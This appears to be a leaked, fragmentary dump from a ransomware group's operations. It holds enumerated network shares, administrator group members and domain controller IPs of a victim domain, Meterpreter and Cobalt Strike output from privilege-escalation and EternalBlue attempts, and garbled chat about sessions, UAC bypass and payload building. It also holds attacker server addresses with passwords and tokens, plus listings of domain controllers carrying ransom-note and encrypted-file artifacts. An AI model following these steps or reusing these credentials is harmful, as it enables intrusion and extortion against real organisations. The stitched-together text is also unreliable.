\\PCHIFSP001.Hobbes.loc\FS-0043 -
\\PCHIFSP001.Hobbes.loc\FS-0044 -
\PCHIFSP001.Hobbes.loc\HR -
\\{\PCHIFSP001.Hobbes.loc\IPC$ - Remote IPC
\\PCHIFSP001.Hobbes.loc\IROA - IROA - ActiveInk Docs
\PCHIFSP001.Hobbes.loc\MARKET -
\PCHIFSP001.Hobbes.loc\MECH -
\\{\PCHIFSP001.Hobbes.loc\MKTG - Business Operations
\\PowerVault NAS Utilities - PowerVault NAS Utilities
\PCHIFSP001.Hobbes.loc\Network -
\PCHIFSP001.Hobbes.loc\Pccommon -
\PCHIFSP001.Hobbes.loc\proj_ae -
\PCHIFSP001.Hobbes.loc\proj_cvl -
\PCHIFSP001.Hobbes.loc\proj_str -
\\PCHIFSP001.Hobbes.loc\PTW6512 -
\PCHIFSP001.Hobbes.loc\Restricted$ -
\\PCHIFSP001.Hobbes.loc\Safety -
\PCHIFSP001.Hobbes.loc\SCANS -
\PCHIFSP001.Hobbes.locSECTLDR -
\\{\PCHIFSP001.Hobbes.loc\Software$ - expFederal Software
\\{\PCHIFSP001.Hobbes.loc\Standard -
\PCHIFSP001.Hobbes.loc\STRUCT -
\PCHIFSP001.Hobbes.loc\Sys - Project Folders
\PCHIFSP001.Hobbes.loc\TENGCNST -
\PCHIFSP001.Hobbes.loc\User$ - Users Folders
\USCHI-NET001.Hobbes.loc\ADMIN$ - Remote Admin
\USCHI-NET001.Hobbes.loc\C$ - Default share
\USCHI-NET001.Hobbes.loc\E$ - Default share
\USCHI-NET001.Hobbes.loc\IPC$ - Remote IPC
\USCHI-NET001.Hobbes.loc\print$ - Printer Drivers
\USCHI-NET001.Hobbes.loc\Software$ -
\USCHI-NET001.Hobbes.loc/USCHI-PLT-0008 - Oce ColorWare Plotter 300
\USCHI-MSE001.Hobbes.loc/address -
\USCHI-MSE001.Hobbes.loc\ADMIN$ - Remote Admin
\USCHI-MSE001.Hobbes.loc\C$ - Default share
\USCHI-MSE001.Hobbes.loc\E$ - Default share
\USCHI-MSE001.Hobbes.loc\F$ - Default share
\USCHI-MSE001.Hobbes.loc\G$ - Default share
\USCHI-MSE001.Hobbes.loc\IPC$ - Remote IPC
\USCHI-MSE004.Hobbes.loc\address -
\USCHI-MSE004.Hobbes.loc\ADMIN$ - Remote Admin
\USCHI-MSE004.Hobbes.loc\C$ - Default share
\USCHI-MSE004.Hobbes.loc\E$ - Default share
\USCHI-MSE004.Hobbes.loc\F$ - Default share
\USCHI-MSE004.Hobbes.loc\G$ - Default share
\USCHI-MSE004.Hobbes.loc\IPC$ - Remote IPC
\USCHI-APG004.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-APG004.Hobbes.loc\Analytics_c8466842-1a17-4bad-abad-7d935647974b -
\USCHI-APG004.Hobbes.loc\C$ - Default share
\USCHI-APG004.Hobbes.loc\E$ - Default share
\USCHI-APG004.Hobbes.loc\F$ - Default share
\\USCHI-APG004.Hobbes.loc\gthrsvc_c8466842-1a17-4bad-abad-7d935647974b-crawl-0 - Crawled Files Sharec8466842-1a17-4bad-abad-7d935647974b-crawl-0
\USCHI-APG004.Hobbes.loc\IPC$ - Remote IPC
\USCHI-APG004.Hobbes.loc\print$ - Printer Drivers
\USCHI-DCG002.Hobbes.loc\ADMIN$ - Remote Admin
\USCHI-DCG002.Hobbes.loc\C$ - Default share
\USCHI-DCG002.Hobbes.loc\IPC$ - Remote IPC
\USCHI-DCG002.Hobbes.loc\print$ - Printer Drivers
\PCHIWSG005.Hobbes.loc\ADMIN$ - Remote Admin
\PCHIWSG005.Hobbes.loc\AM -
\PCHIWSG005.Hobbes.loc\AMM3EXT$ - BC-Meridian Extensions Share
\PCHIWSG005.Hobbes.loc\C$ - Default share
\PCHIWSG005.Hobbes.loc\F$ - Default share
\PCHIWSG005.Hobbes.loc\IPC$ - Remote IPC
\PCHIAPG016.Hobbes.loc\ADMIN$ - Remote Admin
\PCHIAPG016.Hobbes.loc\C$ - Default share
\PCHIAPG016.Hobbes.loc\IPC$ - Remote IPC
\PCHIAPG016.Hobbes.loc\SophosUpdate -
\PCHIAPG016.Hobbes.loc\SUMInstallSet - Sophos Update Manager Installer
\USCHI-PWD001.Hobbes.loc\ADMIN$ - Remote Admin
\USCHI-PWD001.Hobbes.loc\C$ - Default share
\USCHI-PWD001.Hobbes.loc\E$ - Default share
\USCHI-PWD001.Hobbes.loc\F$ - Default share
\USCHI-PWD001.Hobbes.loc\G$ - Default share
\USCHI-PWD001.Hobbes.loc\IPC$ - Remote IPC
\USCHI-DCP001.Hobbes.loc\ADMIN$ - Remote Admin
\USCHI-DCP001.Hobbes.loc\C$ - Default share
\USCHI-DCP001.Hobbes.loc\DAG01.hobbes.loc - File share witness created for microsoft exchange database availability group DAG01.
\USCHI-DCP001.Hobbes.loc\IPC$ - Remote IPC
\USCHI-DCP001.Hobbes.loc/NETLOGON - Logon server share
\USCHI-DCP001.Hobbes.loc\SYSVOL - Logon server share
\PCHIAPG014.Hobbes.loc\ActiveAdministrator - Active Administrator Server Share
\PCHIAPG014.Hobbes.loc\ADMIN$ - Remote Admin
\\{\PCHIAPG014.Hobbes.loc\BEW-4ecbc619f6de49a39b3bda9cec5b9074 - Push Directory
\PCHIAPG014.Hobbes.loc\C$ - Default share
\PCHIAPG014.Hobbes.loc\DADevicePolicyMaster$ - DADevicePolicyMaster$ share
\PCHIAPG014.Hobbes.loc\E$ - Default share
\PCHIAPG014.Hobbes.loc\IPC$ - Remote IPC
\PCHIAPG014.Hobbes.loc\Logs$ - Logs$ share
\PCHIAPG014.Hobbes.loc\SLDAClient$ - SLDAClient$ share
\\PCHIAPG014.Hobbes.loc\Slogic$ - \PCHIAPG014\SLOGIC$ share
\PCHIAPG014.Hobbes.loc\SLscripts$ - SLscripts$ share
\PCHIWSG007.Hobbes.loc\ADMIN$ - Remote Admin
\PCHIWSG007.Hobbes.loc\C$ - Default share
\PCHIWSG007.Hobbes.loc\IPC$ - Remote IPC
\USCHI-DCG003.Hobbes.loc\ADMIN$ - Remote Admin
\USCHI-DCG003.Hobbes.loc\C$ - Default share
\USCHI-DCG003.Hobbes.loc\IPC$ - Remote IPC
\USCHI-DCG003.Hobbes.loc/NETLOGON - Logon server share
\USCHI-DCG003.Hobbes.loc\SYSVOL - Logon server share
\USCHI-BKP001.Hobbes.loc\ADMIN$ - Remote Admin
\USCHI-BKP001.Hobbes.loc\C$ - Default share
\USCHI-BKP001.Hobbes.loc\D$ - Default share
\USCHI-BKP001.Hobbes.loc\E$ - Default share
\USCHI-BKP001.Hobbes.loc\F$ - Default share
\USCHI-BKP001.Hobbes.loc\G$ - Default share
\USCHI-BKP001.Hobbes.loc\IPC$ - Remote IPC
\USCHI-BKP001.Hobbes.loc\print$ - Printer Drivers
\USCHI-PRT001.Hobbes.loc\ADMIN$ - Remote Admin
\USCHI-PRT001.Hobbes.loc\C$ - Default share
\USCHI-PRT001.Hobbes.loc\IPC$ - Remote IPC
\USCHI-PRT001.Hobbes.loc\print$ - Printer Drivers
\\Print$ - Plotters NAME should not contain "_" per vendor recommendation
\\USCHI-PRT001.Hobbes.loc\USCHI-PL_OCECW300_PS - USCHI-PL_OCECW300_PS
\USCHI-PRT001.Hobbes.loc\USCHI-PT_C5045 - South - Canon iR-ADV C5045/5051 PCL6
\USCHI-PRT001.Hobbes.loc\USCHI-PT_C5045_PS - South - Canon iR-ADV C50455051 PS3
\USCHI-PRT001.Hobbes.loc\USCHI-PT_C5255 - North - Canon iR-ADV C5250/5255 PCL6
\USCHI-PRT001.Hobbes.loc\USCHI-PT_C5255_PS - North - Canon iR-ADV C52505255 PS3
\USCHI-PRT001.Hobbes.loc\USCHI-PT_HPCM3530 - South - HP Color LaserJet CM3530
\USCHI-PRT001.Hobbes.loc\USCHI-PT_HPCM3530_PS - South - HP Color LaserJet CM3530 PS
\USCHI-PRT001.Hobbes.loc\USCHI-PT_HPCP3525 - HR Area - HP Color LaserJet CP3525 PCL6
\USCHI-PRT001.Hobbes.loc\USCHI-PT_HPCP3525_PS - HR Area - HP Color LaserJet CP3525 PS
\USCHI-MAXD001.Hobbes.loc\ADMIN$ - Remote Admin
\USCHI-MAXD001.Hobbes.loc\C$ - Default share
\USCHI-MAXD001.Hobbes.loc\IPC$ - Remote IPC
\USCHI-MAXD001.Hobbes.loc\M$ - Default share
\USCHI-MSE003.Hobbes.loc\address -
\USCHI-MSE003.Hobbes.loc\ADMIN$ - Remote Admin
\USCHI-MSE003.Hobbes.loc\C$ - Default share
\USCHI-MSE003.Hobbes.loc\E$ - Default share
\USCHI-MSE003.Hobbes.loc\F$ - Default share
\USCHI-MSE003.Hobbes.loc\G$ - Default share
\USCHI-MSE003.Hobbes.loc\IPC$ - Remote IPC
\USCHI-SQL001.Hobbes.loc\ADMIN$ - Remote Admin
\USCHI-SQL001.Hobbes.loc\C$ - Default share
\USCHI-SQL001.Hobbes.loc\E$ - Default share
\USCHI-SQL001.Hobbes.loc\IPC$ - Remote IPC
\USCHI-SQL001.Hobbes.loc\print$ - Printer Drivers
\\Remote Admin $\DT-000037.Hobbes.loc\ADMIN$ - Remote Admin
\DT-000037.Hobbes.loc\C$ - Default share
\DT-000037.Hobbes.loc\IPC$ - Remote IPC
\PCHIWSG006.Hobbes.loc\70182862-e52d-4fb0-bea2-3448c35de88f-query-0 - Used by Microsoft Search Server 2010 to copy index files between servers.
\PCHIWSG006.Hobbes.loc\ADMIN$ - Remote Admin
\PCHIWSG006.Hobbes.loc\C$ - Default share
\PCHIWSG006.Hobbes.loc\IPC$ - Remote IPC
\USCHI-MSE002.Hobbes.loc\address -
\USCHI-MSE002.Hobbes.loc\ADMIN$ - Remote Admin
\USCHI-MSE002.Hobbes.loc\C$ - Default share
\USCHI-MSE002.Hobbes.loc\E$ - Default share
\USCHI-MSE002.Hobbes.loc\F$ - Default share
\USCHI-MSE002.Hobbes.loc\G$ - Default share
\USCHI-MSE002.Hobbes.loc\IPC$ - Remote IPC
\USCHI-DCG001.Hobbes.loc\ADMIN$ - Remote Admin
\USCHI-DCG001.Hobbes.loc\C$ - Default share
\USCHI-DCG001.Hobbes.loc\IPC$ - Remote IPC
\USCHI-DCG001.Hobbes.loc/NETLOGON - Logon server share
\USCHI-DCG001.Hobbes.loc\SYSVOL - Logon server share
\\{\PCHIDCG004.Hobbes.loc\ADMIN$ - Remote Admin
\PCHIDCG004.Hobbes.loc\C$ - Default share
\PCHIDCG004.Hobbes.loc\IPC$ - Remote IPC
\PCHIDCG004.Hobbes.loc\NETLOGON - Logon server share
\PCHIDCG004.Hobbes.loc\slETL$ -
\PCHIDCG004.Hobbes.loc\SYSVOL - Logon server share
\USCHI-LSS001.Hobbes.loc\ADMIN$ - Remote Admin
\USCHI-LSS001.Hobbes.loc\C$ - Default share
\\Extreme Loading_for_Structures - Extreme Loading┬" for Structures
\USCHI-LSS001.Hobbes.loc\IPC$ - Remote IPC
\USCHI-SPS001.Hobbes.loc/ADMIN$ - Remote Admin
\\USCHI-SPS001.Hobbes.loc\Analytics_8bda09f0-8cbc-4c38-8854-922eb0553239 -
\USCHI-SPS001.Hobbes.loc\C$ - Default share
\USCHI-SPS001.Hobbes.loc\E$ - Default share
\\USCHI-SPS001.Hobbes.loc\gthrsvc_8bda09f0-8cbc-4c38-8854-922eb0553239-crawl-0 - Crawled Files Share8bda09f0-8cbc-4c38-8854-922eb0553239-crawl-0
\USCHI-SPS001.Hobbes.loc\IPC$ - Remote IPC
\USCHI-NWA001.Hobbes.loc\ADMIN$ - Remote Admin
\USCHI-NWA001.Hobbes.loc\C$ - Default share
\USCHI-NWA001.Hobbes.loc\E$ - Default share
\USCHI-NWA001.Hobbes.loc\IPC$ - Remote IPC
\USCHI-NWA001.Hobbes.loc\KC$ -
\USCHI-NWA001.Hobbes.loc\Netwrix_Auditor_Subscriptions$ - This is a default share for uploading Netwrix Auditor subscriptions.
\USCHI-NWA001.Hobbes.loc\Netwrix_UAVR$ - This share contains audit data on user activity collected by Netwrix Auditor.
\USCHI-NWA001.Hobbes.loc\print$ - Printer Drivers
\\Prints$ - Remote Admin
\LT-000108.Hobbes.loc\C$ - Default share
\LT-000108.Hobbes.loc\IPC$ - Remote IPC
\USCHI-VHH010.Hobbes.loc\ADMIN$ - Remote Admin
\USCHI-VHH010.Hobbes.loc\C$ - Default share
\USCHI-VHH010.Hobbes.loc\E$ - Default share
\USCHI-VHH010.Hobbes.loc\IPC$ - Remote IPC
\PCHIDCG003.Hobbes.loc\ADMIN$ - Remote Admin
\PCHIDCG003.Hobbes.loc\C$ - Default share
\PCHIDCG003.Hobbes.loc\IPC$ - Remote IPC
\PCHIDCG003.Hobbes.loc\NETLOGON - Logon server share
\PCHIDCG003.Hobbes.loc\slETL$ -
\PCHIDCG003.Hobbes.loc\SYSVOL - Logon server share
\\{\PCHIAPG011.Hobbes.loc\ADMIN$ - Remote Admin
\PCHIAPG011.Hobbes.loc\C$ - Default share
\PCHIAPG011.Hobbes.loc\IPC$ - Remote IPC
\PCHIAPG011.Hobbes.loc\Lenel$ -
\USCHI-PWA001.Hobbes.loc\ADMIN$ - Remote Admin
\USCHI-PWA001.Hobbes.loc\C$ - Default share
\USCHI-PWA001.Hobbes.loc\E$ - Default share
\USCHI-PWA001.Hobbes.loc\F$ - Default share
\USCHI-PWA001.Hobbes.loc\G$ - Default share
\USCHI-PWA001.Hobbes.loc\H$ - Default share
\USCHI-PWA001.Hobbes.loc\IPC$ - Remote IPC
\\ClusterStorage$ - Cluster Shared Volumes Default Share
\DAG01.Hobbes.loc/IPC$ - Remote IPC
\\{\DT-000033.Hobbes.loc\A$ - Default share
\DT-000033.Hobbes.loc\ADMIN$ - Remote Admin
\\{\DT-000033.Hobbes.loc\C$ - Default share
\DT-000033.Hobbes.loc\IPC$ - Remote IPC
\SQL0005.Hobbes.loc\ActiveInk -
\SQL0005.Hobbes.loc\ADMIN$ - Remote Admin
\\SQL0005.Hobbes.loc\C$ - Default share
\\SQL0005.Hobbes.loc\E$ - Default share
\SQL0005.Hobbes.loc\F$ - Default share
\\SQL0005.Hobbes.loc\G$ - Default share
\SQL0005.Hobbes.loc\IPC$ - Remote IPC
\\SQL0005.Hobbes.loc\Temp -
\USCHI-WSUS001.Hobbes.loc\ADMIN$ - Remote Admin
\USCHI-WSUS001.Hobbes.loc\C$ - Default share
\USCHI-WSUS001.Hobbes.loc\E$ - Default share
\USCHI-WSUS001.Hobbes.loc\IPC$ - Remote IPC
\USCHI-WSUS001.Hobbes.loc\UpdateServicesPackages - A network share to be used by client systems for collecting all software packages (usually applications) published on this WSUS system.
\USCHI-WSUS001.Hobbes.loc\WsusContent - A network share to be used by Local Publishing to place published content on this WSUS system.
\USCHI-WSUS001.Hobbes.loc\WSUSTemp - A network share used by Local Publishing from a Remote WSUS Console Instance.
\USCHI-NET002.Hobbes.loc\ADMIN$ - Remote Admin
\USCHI-NET002.Hobbes.loc\AdminUIContentPayload - AdminUIContentPayload share for AdminUIContent Packages
\USCHI-NET002.Hobbes.loc\C$ - Default share
\USCHI-NET002.Hobbes.loc\Client -
\USCHI-NET002.Hobbes.locD -
\USCHI-NET002.Hobbes.loc\DeploymentShare$ - MDT Deployment Share
\USCHI-NET002.Hobbes.loc\Drivers -
\USCHI-NET002.Hobbes.loc\E$ - Default share
\\EasySetupPayload - EasySetupPayload share for EasySetup Packages
\USCHI-NET002.Hobbes.locF
\USCHI-NET002.Hobbes.loc\F$ - Default share
\USCHI-NET002.Hobbes.loc\ImagesFiles -
\USCHI-NET002.Hobbes.loc\IPC$ - Remote IPC
\USCHI-NET002.Hobbes.loc\print$ - Printer Drivers
\USCHI-NET002.Hobbes.loc\REMINST - RemoteInstallation
\USCHI-NET002.Hobbes.loc\SCCMContentLib$ - 'Configuration Manager' Content Library for site CHI (3/6/2015)
\USCHI-NET002.Hobbes.loc\SMPSTOREF_63F684E9$ - SMS SMP Share
\USCHI-NET002.Hobbes.loc\SMSPKGF$ - SMS Site CHI DP 3/6/2015
\USCHI-NET002.Hobbes.loc\SMSSIG$ - SMS Site CHI DP 3/6/2015
\USCHI-NET002.Hobbes.loc\SMS_CHI - SMS Site CHI 09/21/20
\USCHI-NET002.Hobbes.loc\SMS_CPSC$ - SMS Compressed Package Storage
\USCHI-NET002.Hobbes.loc\SMS_DP$ - ConfigMgr Site Server DP share
\USCHI-NET002.Hobbes.loc\SMS_OCM_DATACACHE - OCM inbox directory
\USCHI-NET002.Hobbes.loc\SMS_SITE - SMS Site CHI 09/21/20
\\SITE - SMS Software Update Installation Agent -- 09/21/20
\USCHI-NET002.Hobbes.loc\SourceFiles -
\USCHI-BKP110.Hobbes.loc\ADMIN$ - Remote Admin
\USCHI-BKP110.Hobbes.loc\C$ - Default share
\USCHI-BKP110.Hobbes.loc\E$ - Default share
\USCHI-BKP110.Hobbes.loc\F$ - Default share
\USCHI-BKP110.Hobbes.loc\G$ - Default share
\USCHI-BKP110.Hobbes.loc\IPC$ - Remote IPC
\USCHI-BKP110.Hobbes.loc\VBRCatalog -
\USCHI-CAS001.Hobbes.loc\ADMIN$ - Remote Admin
\USCHI-CAS001.Hobbes.loc\C$ - Default share
\USCHI-CAS001.Hobbes.loc\CertEnroll - Active Directory Certificate Services share
\USCHI-CAS001.Hobbes.loc\IPC$ - Remote IPC
\USCHI-SBS001.Hobbes.loc\ADMIN$ - Remote Admin
\USCHI-SBS001.Hobbes.loc\C$ - Default share
\USCHI-SBS001.Hobbes.loc\IPC$ - Remote IPC
\USCHI-SBS001.Hobbes.loc/SkypeShare -
\USCHI-SBS001.Hobbes.locSkypeShare1 -
\USCHI-SBS001.Hobbes.loc/Users -
\USCHI-SBS001.Hobbes.loc\xds-replica - Share used for Skype for Business Server replication
\USCHI-SBS002.Hobbes.loc\ADMIN$ - Remote Admin
\USCHI-SBS002.Hobbes.loc\C$ - Default share
\USCHI-SBS002.Hobbes.loc\IPC$ - Remote IPC
\USCHI-EM-LT400.Hobbes.loc\ADMIN$ - Remote Admin
\USCHI-EM-LT400.Hobbes.loc\C$ - Default share
\USCHI-EM-LT400.Hobbes.loc\IPC$ - Remote IPC
\DT-000025.Hobbes.loc\A$ - Default share
\DT-000025.Hobbes.loc\ADMIN$ - Remote Admin
\\{\DT-000025.Hobbes.loc\C$ - Default share
\DT-000025.Hobbes.loc\IPC$ - Remote IPC
\DT-000025.Hobbes.loc\print$ - Printer Drivers
\USCHI-SBS003.Hobbes.loc\ADMIN$ - Remote Admin
\USCHI-SBS003.Hobbes.loc\C$ - Default share
\USCHI-SBS003.Hobbes.loc\IPC$ - Remote IPC
\USCHI-SBS003.Hobbes.loc\print$ - Printer Drivers

``````
Alias name Administrators
Comment

Members

-------------------------------------------------------------------------------
Administrator
HOBBES\AdamsK
HOBBES\Domain Admins
HOBBES\ITSUPPORT
HOBBES\IT-WKSTN-SUPP
HOBBES\PCADMIN

``confuconfuconfuconfucon@tl1''
Group name Enterprise Admins
Comment Designated administrators of the enterprise

Members

-------------------------------------------------------------------------------
DILBERT MS-0001 RAMIREZJ
SPS19-Admin SPS-DB-2019 SPS-TS-2019
SVC-NWA001
```

```
Domain Controllers:

 Server Name IP Address
 ----------- ----------
 PCHIDCG003 10.20.32.100
 PCHIDCG004 10.20.32.28
 USCHI-DCP001 10.20.32.175
 USCHA-DCG002 10.6.0.56
 USCHI-DCG003 10.20.32.103
 USCHI-DCG001 10.20.32.101
 PCHIDCG002 10.111.2.20
``````
Group name Domain Admins
Comment Designated administrators of the domain

Members

-------------------------------------------------------------------------------
DILBERT ePOScan Exchange Service
LaiP MITORATJ MS-0001
PCHIAPG009 PCHIAPG014 PCHIDBG001
RAMIREZJ SAVDeploy SCCMadmin
SCOMaction SLADMIN SPS19-Admin
SPS-DB-2019 SPS-TS-2019 SQL0005
SVC-CAS SVC-ESRI SVC-NWA001
SVC-PW-DBG001 SVC-PWORCHFWK SVC-PW-ORCHFWK
SVC-PWPWD001 SVC-Veeam TAGGESE
USCHIPWA001
USCHIPWD001 USCHIPWW001

``AdFindgowconf''
expFederal.com
``And also without a domain there one more session came even with lou all know the rules write logins in the personal for admin bilder shelkodavo login another session then look for vpndomain not available I have in the cob hangs another session who took off the ad info?
> getsystem
[-] 2001: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[Token Duplication (In Memory/Admin)
[-] Named Pipe Impersonation (RPCSS variant)
meterpreter >
[*] 10.0.0.115 - Meterpreter session 7 closed.  Reason: Died

``failed to work from the input-though my domain is pinged from there- those sessions are not flying in the cobwebs- give me the domain-remove the ad user+ as I see it passed to myself-get that grid from the cobwebs together with @user3 nu elevate the exploit will work
and bypass yuac - no through elevate @user7 once managed to get up not Luckily, it's understandable
Tried a bunch of bypassuacs - all swear like this:
```
when the current user is not in a local admin group there is no point in trying to bypass unac+``
beacon> net domain
[*] Tasked beacon to run net domain
[+] host called home, sent: 257 bytes
``Domain still not resolved?
http://citrixen.peptide.cn/citrix/xenapp/auth/login.aspx
```

Vin Serv 2008

All users who have creeds are on the same computer.
LA is not among them.
Domain is not responding
No WPN configs
No char
No Credits in txt or other

There is no vulnerability on MS17:
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
```
[*] Started reverse TCP handler on 173.234.155.45:9875
[*] 192.168.1.190:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[*] 192.168.1.190:445 - Scanned 1 of 1 hosts (100% complete)
[-] 192.168.1.190:445 - Exploit aborted due to failure: not-vulnerable: Set ForceExploit to override
[*] Exploit completed, but no session was created.
```

I ran it through the multihandler to the Meterpreter:
`getsystem' - bypassed

Tried a bunch of bypassuacs - all swear like this:
`Not in admins group, cannot escalate with this module
Or it goes like this:
`not-vulnerable: Target is not vulnerable`

I tried this (This module attempts to exploit existing administrative privileges to obtain a SYSTEM session)
Didn't help much either:
```
msf6 exploit(windows/local/service_permissions) > exploit

[*] Trying to add a new service...
[*] Trying to find weak permissions in existing services...
[*] [CitrixICAFileSigningService] Cannot reliably determine path: "C:\Program Files (x86)\Citrix\DeliveryServices\ICAFileSigningService\Citrix.DeliveryServices.ICASign.ServiceHost.exe"
[*] [Citrix_GTLicensingProv] Cannot reliably determine path: "C:\Program Files (x86)\Citrix\Licensing\LicWMI\Citrix_GTLicensingProv.exe"
[+] [HipsDaemon] Write access to C:\Program Files (x86)\Huorong\Sysdiag\bin\HipsDaemon.exe
[+] [knbcenter] Write access to D:\Program Files (x86)\liebao\liebao\6.5.115.18480\KNBCenter.exe
[*] [TermServLicensing] Cannot reliably determine path: C:\Windows\system32\svchost -k TSLicensing
``Mother won't appreciate it[ ](https://mediaeveryone.com/channel/general?msg=8aL7r47YQBW2B3L83) I was talking about logins, passwords, names, comments, files[ ](https://mediaeveryone.com/channel/general?msg=ugbQDs48KqS6Tt8RW) nopeYou were talking about logins, no passwords. Will there be any more?[ ](https://mediaeveryone.com/channel/general?msg=HJkjZDuH55qPtgNXX) how the fuck did I say? Take 3 sessions to 1 setcada@tl1 parsing sessions? Password change passwd``
23.106.160.50 p17464
pwd:Lukashenko228!

you have to do it every time you go in ssh/usr/bin/bash
useradd -m username --shell "shell path" && passwd username
``password set``? create a sheet of your own for now.... Are you serious... i must have tried before you write and when you specify explicitly need to write along with the useradd -m -d /home/user3 user name, it creates itself in /home when you specify the directory do not need to write the full path possible centOS or pure Deb there is no such a fuck up not understand that with vds i create usera with explicit directory specify useradd -m -d /home/user3 user3

I'm logged out in a new terminal and see this ```.
 * Ubuntu 20.04 LTS is out, raising the bar on performance, security,
   and optimisation for Intel, AMD, Nvidia, ARM64 and Z15 as well as
   AWS, Azure and Google Cloud.

     https://ubuntu.com/blog/ubuntu-20-04-lts-arrives


0 updates can be installed immediately.
0 of these updates are security updates.


$ hole
-sh: 1: holes: not found
$ ls
$


```
I specify mkhomedir_helper user3
does not work either. I check cat /etc/passwd ``
user3:x:1000:1000::/home/user3:/bin/sh

``Waiting for sessions, disassembling, working.
206.221.186.34:44482
pqtbjTVtIMYBudInFs7VVVoZDHjDvqtAR1v
``Current postpone other than @user4 so move onokayshob do not get lost can a separate channel for feedback ?on the additional modules - link + reason / descriptionNecessary to make that commands collected kerbs, out of the box worked smbauto brut, was able to download files, one command remove the addfind, one command output da, da, and other things. This is at least[ ](https://mediaeveryone.com/channel/general?msg=bDpJ3zLXSYmxHhHrY) PowerView.ps1[ ](https://mediaeveryone.com/channel/general?msg=5yjoSi3NSkCQSnsir) what kind of preview?[ ](https://mediaeveryone.com/channel/general?msg=crkwCi6fnbuPQTLDW) more specifically, links to git and other stuff that would raise the privileges[ ](https://mediaeveryone.com/channel/general?msg=dmJFPzMKqLbG5fg9C) links and stuff, what is necessary[ ](https://mediaeveryone.com/channel/general?msg=TWStQoGThWpNCeeya) mostly bugs, okay[ ](https://mediaeveryone.com/channel/general?msg=TWStQoGThWpNCeeya) ++No way to download files from the client pc, in ptn downloaded (see Download Files), but there is no download (opens a new tab - server not found.
I would like to import scripts directly from the PC to the Ptsh, rather than via a link.
Problems with sockets - comes in two or three sessions. If you work in one session, you write a command, but it is duplicated two or three times, the same number of sessions flew in...Well, the built-in toolkit could be richer...in coba it is less frequent in times, it is hardly a complaint about the tool, coba in ass conditions also often dies or does not knock) very often sessions die, which is a minus)))) there is also a button of files .... mmmvt it's blueada, i couldn't find it either until they said there's a button visiblebug[ ](https://mediaeveryone.com/channel/general?msg=7djo2SGBKa9nAjEax) about the line at the top? nothing more to say i would like a normal panel, not a white rectangle
I would like to have a normal panel, not a white rectangle. give feedbackstatus write to the confab at once yesterday check them again? check all sisd servers + availability on what? check all the servers sisd.petya probably..who's free now? set up for msf-deploy your arma there and work together today will have to sufferOne for all is not an option. The entire subnet gets pulled into the armoue if you scan. + will be a hassle if you work at the same time in the arm still in msfnu since the time you have gained experience so you can try again)I do not remember, we originally had one for all was...and what was it that worked in turns in what? so like will conflict, if the crowd there also fell off so one for all. all who need to replace the old one in the sense of it for one? do not forget to remove inactive sessions behind you?
23.106.160.50:17464
HJ6Hmf7KNP3w2w7HCtprxRHGg6q92E9LsvWLv98y
``ShellConcatination --source=shellStarter_llvm_x64.dll -keep --target=pl64.dll --addBin=plbin `this is how you built, pyload x64 check the system bit type x86 ? how did you build and run ? if all went well the domain authorization should have diedwhy ?

beacon> ls \\admindc1\c$
[*] Tasked beacon to list files in \admindc1\c$
[+] host called home, sent: 31 bytes
[*] Listing: \admindc1\c$$

 Size Type Last Modified Name
 ---- ---- ------------- ----
          dir 07/10/2020 08:19:50 $Recycle.Bin
          dir 12/08/2020 23:30:15 AdminDC1
          dir 12/08/2020 23:30:15 batch
          dir 12/08/2020 23:30:15 ck-agent
          dir 10/26/2018 09:36:07 Documents and Settings
          dir 12/08/2020 23:30:15 inetpub
          dir 12/08/2020 23:30:16 logs
          dir 12/09/2020 12:27:52:52 MSI
          dir 10/26/2018 13:40:56 PerfLogs
          dir 12/08/2020 23:30:16 Program Files
          dir 12/09/2020 02:24:43 Program Files (x86)
          dir 12/08/2020 23:30:16 ProgramData
          dir 12/08/2020 23:30:16 Recovery
          dir 12/08/2020 23:30:10 System Volume Information
          dir 10/12/2020 15:18:46 temp
          dir 12/08/2020 23:30:16 Users
          dir 12/02/2020 03:33:28 Windows
          dir 12/08/2020 23:30:16 Zabbix_Agent
 1kb fil 12/08/2020 23:30:15 AdminDC1.admin.sisd.k12_admindc1(8).req.HWOEU
 1kb fil 12/08/2020 23:30:15 admindc1.cer.HWOEU
 375kb fil 07/16/2016 07:18:08 bootmgr
 535b fil 12/08/2020 23:30:15 BOOTNXT.HWOEU
 16gb fil 11/13/2020 07:53:40 pagefile.sys
 1kb fil 12/08/2020 23:30:15 readme.txt
 40mb fil 12/09/2020 08:06:26 redcloak.msi

beacon> ls \\admindc2\c$
[*] Tasked beacon to list files in \admindc2\c$
[+] host called home, sent: 31 bytes
[-] could not open \\admindc2\c$\*: 53
beacon> ls \\\admindc3\c$
[*] Tasked beacon to list files in \admindc3\c$
[+] host called home, sent: 31 bytes
[*] Listing: \admindc3\c$$

 Size Type Last Modified Name
 ---- ---- ------------- ----
          dir 07/28/2019 07:12:07 $Recycle.Bin
          dir 12/08/2020 23:32:07 ck-agent
          dir 12/09/2020 02:39:28 Config.Msi
          dir 10/26/2018 15:02:45:45 Documents and Settings
          dir 12/08/2020 23:32:08 Logs
          dir 10/29/2018 14:52:44 PerfLogs
          dir 12/08/2020 23:32:08 Program Files
          dir 12/09/2020 02:39:18 Program Files (x86)
          dir 12/08/2020 23:32:08 ProgramData
          dir 12/08/2020 23:32:08 Recovery
          dir 12/08/2020 21:50:51 System Volume Information
          dir 12/08/2020 23:32:08 Users
          dir 12/02/2020 03:45:13 Windows
          dir 12/08/2020 23:32:08 Zabbix_Agent
 375kb fil 07/16/2016 07:18:08 bootmgr
 535b fil 12/08/2020 23:32:07 BOOTNXT.HWOEU
 16gb fil 11/13/2020 16:25:59 pagefile.sys
 1kb fil 12/08/2020 23:32:07 readme.txt
 40mb fil 12/09/2020 08:06:26 redcloak.msi

beacon> ls \\\admindc4\c$
[*] Tasked beacon to list files in \admindc4\c$
[+] host called home, sent: 31 bytes
[*] Listing: \admindc4\c$$

 Size Type Last Modified Name
 ---- ---- ------------- ----
          dir 07/11/2019 13:34:37 $Recycle.Bin
          dir 12/08/2020 23:32:33 ck-agent
          dir 10/29/2018 09:10:11:11 Documents and Settings
          dir 12/08/2020 23:32:35 Logs
          dir 10/29/2018 13:19:55 PerfLogs
          dir 12/08/2020 23:32:35 Program Files
          dir 12/09/2020 02:41:13 Program Files (x86)
          dir 12/08/2020 23:32:35 ProgramData
